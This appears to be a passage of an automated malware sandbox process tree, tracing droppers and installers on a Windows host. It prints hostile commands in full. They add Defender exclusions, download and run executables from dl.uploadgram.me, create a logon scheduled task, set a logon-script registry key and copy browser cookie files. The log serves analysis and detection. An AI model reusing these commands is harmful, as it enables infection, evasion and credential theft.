"C:\Users\Admin\AppData\Local\Temp\fa-f7d42-4ca-3739d-71c1c1e0cf06c\Baezhizhybaeja.exe"
8⤵
PID:6336

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\escqathd.pcg\GcleanerEU.exe /eufive & exit
9⤵
PID:5648

C:\Users\Admin\AppData\Local\Temp\escqathd.pcg\GcleanerEU.exe
C:\Users\Admin\AppData\Local\Temp\escqathd.pcg\GcleanerEU.exe /eufive
10⤵
PID:8788

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2juymkst.m0u\installer.exe /qn CAMPAIGN="654" & exit
9⤵
PID:7752

C:\Users\Admin\AppData\Local\Temp\2juymkst.m0u\installer.exe
C:\Users\Admin\AppData\Local\Temp\2juymkst.m0u\installer.exe /qn CAMPAIGN="654"
10⤵
PID:8928

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\o5fwrc5r.w2z\ufgaa.exe & exit
9⤵
PID:8296

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\atc42s5h.eya\anyname.exe & exit
9⤵
PID:8740

C:\Users\Admin\AppData\Local\Temp\atc42s5h.eya\anyname.exe
C:\Users\Admin\AppData\Local\Temp\atc42s5h.eya\anyname.exe
10⤵
PID:8540

C:\Users\Admin\AppData\Local\Temp\atc42s5h.eya\anyname.exe
"C:\Users\Admin\AppData\Local\Temp\atc42s5h.eya\anyname.exe" -q
11⤵
PID:8888

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nocpi0lo.b2d\gcleaner.exe /mixfive & exit
9⤵
PID:8916

C:\Users\Admin\AppData\Local\Temp\nocpi0lo.b2d\gcleaner.exe
C:\Users\Admin\AppData\Local\Temp\nocpi0lo.b2d\gcleaner.exe /mixfive
10⤵
PID:8768

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jealh0ei.15t\autosubplayer.exe /S & exit
9⤵
PID:8380

C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
5⤵
PID:5360

C:\Users\Admin\Documents\XSfwuWpNE2V1rz6j_m2Fy57r.exe
"C:\Users\Admin\Documents\XSfwuWpNE2V1rz6j_m2Fy57r.exe"
6⤵
PID:4924

C:\Users\Admin\Documents\z6bB2x5nAcREXc8NvL2R0HNc.exe
"C:\Users\Admin\Documents\z6bB2x5nAcREXc8NvL2R0HNc.exe"
6⤵
PID:6580

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6580 -s 660
7⤵
- Program crash
PID:7380

C:\Users\Admin\Documents\TnmOFgOaqtpeIJKlBhhq7hD3.exe
"C:\Users\Admin\Documents\TnmOFgOaqtpeIJKlBhhq7hD3.exe"
6⤵
PID:6508

C:\Users\Admin\Documents\rViLFJ1s02xNtBgNh6z_AhgM.exe
"C:\Users\Admin\Documents\rViLFJ1s02xNtBgNh6z_AhgM.exe"
6⤵
PID:5632

C:\Users\Admin\AppData\Local\Temp\is-L0H25.tmp\rViLFJ1s02xNtBgNh6z_AhgM.tmp
"C:\Users\Admin\AppData\Local\Temp\is-L0H25.tmp\rViLFJ1s02xNtBgNh6z_AhgM.tmp" /SL5="$80030,138429,56832,C:\Users\Admin\Documents\rViLFJ1s02xNtBgNh6z_AhgM.exe"
7⤵
PID:6924

C:\Users\Admin\AppData\Local\Temp\is-79R73.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-79R73.tmp\Setup.exe" /Verysilent
8⤵
PID:1536

C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
9⤵
PID:6468

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629282281 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
10⤵
PID:7040

C:\Users\Admin\Documents\CgJpvCo53USH6wGBsS1sZ0LD.exe
"C:\Users\Admin\Documents\CgJpvCo53USH6wGBsS1sZ0LD.exe"
6⤵
PID:6696

C:\Users\Admin\Documents\CgJpvCo53USH6wGBsS1sZ0LD.exe
C:\Users\Admin\Documents\CgJpvCo53USH6wGBsS1sZ0LD.exe
7⤵
PID:7224

C:\Users\Admin\Documents\dpWiXuhH9ho38OzbMT0bEQ2c.exe
"C:\Users\Admin\Documents\dpWiXuhH9ho38OzbMT0bEQ2c.exe"
6⤵
PID:6804

C:\Users\Admin\Documents\zEfmPt90rzSopvLpBlPL2RRC.exe
"C:\Users\Admin\Documents\zEfmPt90rzSopvLpBlPL2RRC.exe"
6⤵
PID:6968

C:\Users\Admin\Documents\zEfmPt90rzSopvLpBlPL2RRC.exe
"C:\Users\Admin\Documents\zEfmPt90rzSopvLpBlPL2RRC.exe"
7⤵
PID:10164

C:\Users\Admin\Documents\ASJK5ES2koO5yAPesHmPVN8p.exe
"C:\Users\Admin\Documents\ASJK5ES2koO5yAPesHmPVN8p.exe"
6⤵
PID:4388

C:\Users\Admin\Documents\boQfT5w04ssp2iAhPWEWTW1_.exe
"C:\Users\Admin\Documents\boQfT5w04ssp2iAhPWEWTW1_.exe"
6⤵
PID:3328

C:\Users\Admin\Documents\8OQJIFlE3xQYcN05XKpLy6b6.exe
"C:\Users\Admin\Documents\8OQJIFlE3xQYcN05XKpLy6b6.exe"
6⤵
PID:7060

C:\Users\Admin\Documents\TC1pCt2JqaKV2k88JhIIuRqH.exe
"C:\Users\Admin\Documents\TC1pCt2JqaKV2k88JhIIuRqH.exe"
6⤵
PID:5812

C:\Users\Admin\Documents\TC1pCt2JqaKV2k88JhIIuRqH.exe
C:\Users\Admin\Documents\TC1pCt2JqaKV2k88JhIIuRqH.exe
7⤵
PID:7528

C:\Users\Admin\Documents\H0K64USsRtFidlR4COiAiBBN.exe
"C:\Users\Admin\Documents\H0K64USsRtFidlR4COiAiBBN.exe"
6⤵
PID:6748

C:\Users\Admin\Documents\H0K64USsRtFidlR4COiAiBBN.exe
C:\Users\Admin\Documents\H0K64USsRtFidlR4COiAiBBN.exe
7⤵
PID:7908

C:\Users\Admin\Documents\6ginCTnXhtz4p18vyaLqxgvv.exe
"C:\Users\Admin\Documents\6ginCTnXhtz4p18vyaLqxgvv.exe"
6⤵
PID:5508

C:\Users\Admin\AppData\Roaming\2469099.exe
"C:\Users\Admin\AppData\Roaming\2469099.exe"
7⤵
PID:4232

C:\Users\Admin\AppData\Roaming\6010765.exe
"C:\Users\Admin\AppData\Roaming\6010765.exe"
7⤵
PID:4188

C:\Users\Admin\AppData\Roaming\3053378.exe
"C:\Users\Admin\AppData\Roaming\3053378.exe"
7⤵
PID:5868

C:\Users\Admin\Documents\3LnGmlSQ6XFEyjFB3TYQ8Vev.exe
"C:\Users\Admin\Documents\3LnGmlSQ6XFEyjFB3TYQ8Vev.exe"
6⤵
PID:6452

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', '%Temp%\\installer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', '%AppData%\\RuntimeBroker.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', '%Temp%\\launcher.exe') & powershell Start-Process -FilePath '%Temp%\\installer.exe' & powershell Start-Process -FilePath '%AppData%\\RuntimeBroker.exe' & powershell Start-Process -FilePath '%Temp%\\launcher.exe' & exit
7⤵
PID:7184

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
8⤵
PID:6120

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
8⤵
PID:6808

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
8⤵
PID:8752

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
8⤵
PID:10080

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', 'C:\Users\Admin\AppData\Local\Temp\\installer.exe')
8⤵
PID:5108

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe')
8⤵
PID:9232

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe')
8⤵
PID:10196

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\installer.exe'
8⤵
PID:9776

C:\Users\Admin\AppData\Local\Temp\installer.exe
"C:\Users\Admin\AppData\Local\Temp\installer.exe"
9⤵
PID:10080

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
10⤵
PID:9504

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
11⤵
PID:7744

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
11⤵
PID:6352

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
11⤵
PID:9796

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\installer.exe"
10⤵
PID:9916

C:\Users\Admin\AppData\Local\Temp\svchost32.exe
C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\installer.exe"
11⤵
PID:10072

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
12⤵
PID:1332

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
13⤵
- Creates scheduled task(s)
PID:6968

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe'
8⤵
PID:4708

C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
"C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"
9⤵
PID:4848

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe'
8⤵
PID:6968

C:\Users\Admin\AppData\Local\Temp\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\launcher.exe"
9⤵
PID:1336

C:\Users\Admin\AppData\Local\Temp\launcher.exe
"{path}"
10⤵
PID:9276

C:\Users\Admin\Documents\6XReqGdcnRN2oC125ZEp85FG.exe
"C:\Users\Admin\Documents\6XReqGdcnRN2oC125ZEp85FG.exe"
6⤵
PID:5612

C:\Users\Admin\Documents\j7kbQ5ncTn6vVvrA5jjuM1W_.exe
"C:\Users\Admin\Documents\j7kbQ5ncTn6vVvrA5jjuM1W_.exe"
6⤵
PID:5552

C:\Users\Admin\Documents\58DRA_h0CadzEX60FTKMz5A9.exe
"C:\Users\Admin\Documents\58DRA_h0CadzEX60FTKMz5A9.exe"
6⤵
PID:4520

C:\Users\Admin\Documents\58DRA_h0CadzEX60FTKMz5A9.exe
C:\Users\Admin\Documents\58DRA_h0CadzEX60FTKMz5A9.exe
7⤵
PID:7636

C:\Users\Admin\Documents\ZT1jvruAWBISOrPsPZ3RT28y.exe
"C:\Users\Admin\Documents\ZT1jvruAWBISOrPsPZ3RT28y.exe"
6⤵
PID:5220

C:\Users\Admin\Documents\jZP7ZZTMmPBSXKB5D2lvCPez.exe
"C:\Users\Admin\Documents\jZP7ZZTMmPBSXKB5D2lvCPez.exe"
6⤵
PID:4224

C:\Users\Admin\Documents\vqkDfCSnO2vCSl9aj1G376Nn.exe
"C:\Users\Admin\Documents\vqkDfCSnO2vCSl9aj1G376Nn.exe"
6⤵
PID:6196

C:\Users\Admin\Documents\imxitOV0wWuTxS3YAbfEq5M9.exe
"C:\Users\Admin\Documents\imxitOV0wWuTxS3YAbfEq5M9.exe"
6⤵
PID:6120

C:\Users\Admin\Documents\imxitOV0wWuTxS3YAbfEq5M9.exe
"C:\Users\Admin\Documents\imxitOV0wWuTxS3YAbfEq5M9.exe" -q
7⤵
PID:4708

C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
"C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
5⤵
PID:5292

C:\Users\Admin\AppData\Local\Temp\tmp6722_tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp6722_tmp.exe"
6⤵
PID:4252

C:\Windows\SysWOW64\dllhost.exe
"C:\Windows\System32\dllhost.exe"
7⤵
PID:7464

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
7⤵
PID:7664

C:\Windows\SysWOW64\cmd.exe
cmd
8⤵
PID:4004

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
9⤵
PID:5840

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
Esplorarne.exe.com i
9⤵
PID:4804

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
10⤵
PID:8672

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
11⤵
PID:9164

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
12⤵
PID:8636

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
13⤵
PID:9212

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
14⤵
PID:8696

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
15⤵
PID:5704

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
16⤵
PID:8964

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
17⤵
PID:8060

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
18⤵
PID:8128

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
19⤵
PID:6976

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
20⤵
PID:7280

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
21⤵
PID:964

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
22⤵
PID:1844

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
23⤵
PID:724

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
24⤵
PID:3688

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
25⤵
PID:1012

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
26⤵
PID:7760

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
27⤵
PID:8796

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
28⤵
PID:964

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
29⤵
PID:1844

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
30⤵
PID:8152

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
31⤵
PID:912

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
32⤵
PID:6364

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
33⤵
PID:5520

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
34⤵
PID:384

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
35⤵
PID:9208

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
36⤵
PID:6712

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
37⤵
PID:8724

C:\Windows\SysWOW64\PING.EXE
ping RJMQBVDN -n 30
9⤵
- Runs ping.exe
PID:8496

C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
5⤵
PID:5220

C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
6⤵
PID:5452

C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
5⤵
PID:5156

C:\Users\Admin\AppData\Roaming\8104798.exe
"C:\Users\Admin\AppData\Roaming\8104798.exe"
6⤵
PID:5124

C:\Users\Admin\AppData\Roaming\5095205.exe
"C:\Users\Admin\AppData\Roaming\5095205.exe"
6⤵
PID:3012

C:\Users\Admin\AppData\Roaming\7660298.exe
"C:\Users\Admin\AppData\Roaming\7660298.exe"
6⤵
PID:5968

C:\Users\Admin\AppData\Roaming\4510927.exe
"C:\Users\Admin\AppData\Roaming\4510927.exe"
6⤵
PID:6032

C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
5⤵
PID:1968

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
1⤵
PID:4600

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
1⤵
PID:4544

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
1⤵
PID:5900

C:\Users\Admin\AppData\Local\Temp\is-N7KIN.tmp\Inlog.tmp
"C:\Users\Admin\AppData\Local\Temp\is-N7KIN.tmp\Inlog.tmp" /SL5="$102C8,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
1⤵
PID:1536

C:\Users\Admin\AppData\Local\Temp\is-T2GT0.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-T2GT0.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
2⤵
PID:7872

C:\Users\Admin\AppData\Local\Temp\is-JOG8H.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-JOG8H.tmp\Setup.tmp" /SL5="$604DA,17369807,721408,C:\Users\Admin\AppData\Local\Temp\is-T2GT0.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
3⤵
PID:7424

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-P8AG4.tmp\{app}\microsoft.cab -F:* %ProgramData%
4⤵
PID:7844

C:\Windows\SysWOW64\expand.exe
expand C:\Users\Admin\AppData\Local\Temp\is-P8AG4.tmp\{app}\microsoft.cab -F:* C:\ProgramData
5⤵
PID:6284

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
4⤵
- Blocklisted process makes network request
PID:4412

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
5⤵
PID:8984

C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
4⤵
PID:7304

C:\Users\Admin\AppData\Local\Temp\is-P8AG4.tmp\{app}\vdi_compiler.exe
"C:\Users\Admin\AppData\Local\Temp\is-P8AG4.tmp\{app}\vdi_compiler"
4⤵
PID:3308

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-P8AG4.tmp\{app}\vdi_compiler.exe"
5⤵
PID:1964

C:\Windows\SysWOW64\PING.EXE
ping localhost -n 4
6⤵
- Runs ping.exe
PID:8836

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
4⤵
PID:6276

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
1⤵
PID:5788

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:5832

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
2⤵
PID:4100

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:6544

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:7288

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding A36BB2745CC5C77D28F2E8B3EA6B0087 C
2⤵
PID:6972

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 5AAF63B790A49186C29283D582D68548 C
2⤵
PID:6420

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding F6D5F4C5C90C9F0ED68735C911ACFB51
2⤵
PID:6204

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 59A76B1055D4E684011DB0EC106D3675 C
2⤵
PID:8868

C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
2⤵
PID:724

C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
3⤵
PID:2540

C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
4⤵
PID:8528

C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x1dc,0x1e0,0x1e4,0x1b8,0x1e8,0x7ffc0023dec0,0x7ffc0023ded0,0x7ffc0023dee0
5⤵
PID:8112

C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1652,5458917286362979523,13208364140039155422,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8528_1050516471" --mojo-platform-channel-handle=1716 /prefetch:8
5⤵
PID:9240

C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
